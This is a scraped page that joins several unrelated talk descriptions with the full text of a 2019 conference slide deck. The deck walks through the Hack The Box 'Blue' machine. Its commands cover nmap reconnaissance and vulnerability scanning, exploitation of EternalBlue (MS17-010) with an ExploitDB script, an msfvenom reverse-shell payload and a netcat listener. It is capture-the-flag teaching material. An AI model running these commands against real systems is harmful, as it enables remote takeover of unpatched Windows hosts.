BIO: Sostenitrice del software libero e dei formati standard e aperti. È stata un membro attivo dei progetti Fedora e openSUSE e ha co-fondato l'Associazione LibreItalia dove è stata coinvolta in diversi eventi, migrazioni e formazione relativi a LibreOffice. In precedenza ha lavorato a migrazioni e corsi di formazione su LibreOffice per diverse amministrazioni pubbliche e privati. Da gennaio 2020 lavora in SUSE come Software Release Engineer per Uyuni e SUSE Manager e quando non segue la sua passione per i computer e per Geeko coltiva la sua curiosità per l'astronomia (da cui deriva il suo nickname deneb_alpha).
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...SOFTTECHHUB
The choice of an operating system plays a pivotal role in shaping our computing experience. For decades, Microsoft's Windows has dominated the market, offering a familiar and widely adopted platform for personal and professional use. However, as technological advancements continue to push the boundaries of innovation, alternative operating systems have emerged, challenging the status quo and offering users a fresh perspective on computing.
One such alternative that has garnered significant attention and acclaim is Nitrux Linux 3.5.0, a sleek, powerful, and user-friendly Linux distribution that promises to redefine the way we interact with our devices. With its focus on performance, security, and customization, Nitrux Linux presents a compelling case for those seeking to break free from the constraints of proprietary software and embrace the freedom and flexibility of open-source computing.
Pushing the limits of ePRTC: 100ns holdover for 100 daysAdtran
At WSTS 2024, Alon Stern explored the topic of parametric holdover and explained how recent research findings can be implemented in real-world PNT networks to achieve 100 nanoseconds of accuracy for up to 100 days.
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
Dr. Sean Tan, Head of Data Science, Changi Airport Group
Discover how Changi Airport Group (CAG) leverages graph technologies and generative AI to revolutionize their search capabilities. This session delves into the unique search needs of CAG’s diverse passengers and customers, showcasing how graph data structures enhance the accuracy and relevance of AI-generated search results, mitigating the risk of “hallucinations” and improving the overall customer journey.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slack
Nous Sommes Cyber - HTB Blue
1. WE ARE CYBER/NOUS SOMMES CYBER
MONTREAL 2019
PRESENTED BY DIANA WHITNEY
HTB :
BLUE
2. WHOAMI
• Diana Whitney
• IT Security Specialist at EWA-Canada since 2015
• Payment Assurance Lab – PCI PTS POI Standards testing
• Secure That Cert! CySA+ and PenTest+
3. WHAT WILL WE COVER?
• Quick intro to Hack the Box and the Blue machine
• Reconnaissance
• Vulnerability Identification
• Exploitation
• Walkthrough demo
4. • https://www.hackthebox.eu/
• Deliberately vulnerable machines
• Each one has a unique exploit – test your skills against it
• CVEs
• Enumeration
• Real-Life
• CTF-Like
• Custom Exploitation
5.
6. RECONNAISSANCE
• Gather information about our target
• Open ports – TCP and UDP
• Service identification
• Operating System
• Service/OS Versions
• We will be using Nmap
7. NMAP
• Free but powerful tool
• Host discovery
• Network mapping
• Port scanning
• Version and OS detection
• Customizable scans using Nmap Scripting Engine (NSE)
• Command line and GUI (Zenmap) versions
• Many cheat sheets are available online
8. RECONN WITH NMAP
• nmap -sC -sV -O -oA initial 10.10.10.40
• -sC scans the target using the default Nmap scripts
• -sV attempts to identify the version of services found running on open
ports
• -O attempts to ID the host’s operating systems
• -oA outputs the scan results into a file called ‘initialscan’
• 10.10.10.40 is our target
9. • Port 139 is open and running netbios-ssn
• Port 445 is running Microsoft-ds
• Ports 135, 49152-7 are running msrpc
10. Our scripts used the SMB protocol running on the open ports to lea
more about the host:
• OS – Windows 7 Pro
• Security mode
11. MORE NMAP
• Initial scan only scans the top 1000 ports
• Adding -p- to the command tells nmap to scan all 65535 ports
• To scan UDP ports instead of TCP ports
• nmap -sU -O -p- -oA udpfull 10.10.10.40
12. NMAP VULNERABILITY SCRIPTS
• nmap --script vuln -oA vulnerabilities –p 139,445 10.10.10.40
• Previous scan used nmap’s default scripts – fast and non
invasive
• Vulnerability scripts will look for any potential exploits on the
open ports
• Can be extra slow – scan specific ports using -p
13. • Script smb-vuln-ms17-010 returned a positive result
• Code execution vulnerability in MS SMBv1 servers
• ID ms17-010 is also known as CVE-2017-0143 - EternalBlue
14. • Developed by the NSA and leaked by Shadow Brokers hacker
group in 2017
• Exploits SMBv1, a protocol that allows Windows-based
computers on a local network to share files easily
• Allows a remote attacker to execute arbitrary code on a
vulnerable machine by sending specially crafted packets
• Used in the WannaCry and NotPetya ransomware attacks of
2017
• CVE-2017-0143
15. AWESOME, LET’S EXPLOIT IT!
• Search for available, ‘pre-made’ exploits
• ExploitDB - https://github.com/offensive-security/exploitdb
• Git repository of exploits maintained by Offensive Security
• Searchsploit is a command line search tool for Exploit-DB
• Search available exploits based off the vulnerability’s ID
18. LET’S EXAMINE THE CONTENTS OF
42315.PY…
• There will be a function call for ‘mysmb’
• We can get it from the provided URL using wget
19. • File will be saved as 42315.py.1, since we already have a
42315.py
• Change the filename:
• mv 42315.py.1 mysmb.py
20. • The script requires credentials in order to exploit the target
• We find them using enum4linux
• Since ‘none’ is an option, we can assume this machine allows
us to log in with no username or password.
21. • Last we need to modify the python code to add a payload
• This will be the executable file we send to the target machine
and have it run
• To gain access to the target, we’ll send a payload that will set
up a reverse shell request
• Generate the payload using MSFVenom
22. • msfvenom -p windows/shell_reverse_tcp -f exe
LHOST=10.10.14.x LPORT=4444 > eternalblue.exe
• https://redteamtutorials.com/2018/10/24/msfvenom-
cheatsheet/
• -p – our payload – windows/shell_reverse_tcp
• -f format – exe
• LHOST – the IP address of our attack machine (local host) – 10.10.14.7
• Your IP address can be found on HTB ‘Access’ page, or by running ifconfig
• LPORT – a port on our machine – we’ll use 4444 since it’s unlikely that it’s being used for
anything else
• eternalblue.exe – the executable file generated by this command
23. • Alter the script to send eternalblue.exe from its location on the
host machine to the target machine
• Script will then execute eternalblue.exe on the target machine
24. • Use Netcat to set up a listener on the attacking machine
• nc -nvlp 4444
• The attack machine is now listening for an incoming request
from the target machine
• Now run the python script
• python 42315.py 10.10.10.40
25. WHEN the python script runs successfully, the reverse shell request will be
by the attack machine. We now have access to the target. Run ‘whoami’ in
No privilege escalation required – EternalBlue has granted us system ac
Enum4linux is a reconnaissance tool for enumerating information from Windows and Samba systems
-a Does all simple enumeration
Userlists
Password policy information
Group and member list
OS information
Cheat sheets
MSFVenom is a powerful too for payload generation and encoding
We sent our victim a script that, when run on the target, will send a request back to our machine to open a shell.
We need to make sure our machine is listening on the port we put into the script
N – No DNS lookups on the other machine’s name
V – Verbose, inform us of successful connection
L – Listen harder! Makes Netcat start listening again after a client disconnects
P – Local port